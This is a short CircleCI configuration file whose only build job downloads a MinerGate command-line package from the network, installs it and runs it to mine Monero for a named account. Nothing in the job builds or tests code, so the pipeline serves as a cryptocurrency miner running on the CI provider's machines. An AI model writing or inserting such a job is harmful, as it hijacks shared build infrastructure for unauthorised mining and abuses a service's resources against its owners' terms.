version: 2
jobs:
  build:
    docker:
      - image: debian:stretch
    steps:
      - checkout
      - run:
          command: |
            apt update --yqq
            apt install libpcre16-3 wget --yqq
            wget https://minergate.com/download/ubuntu-cli
            dpkg -i ubuntu-cli
            minergate-cli --user yoginth@outlook.in --xmr 8
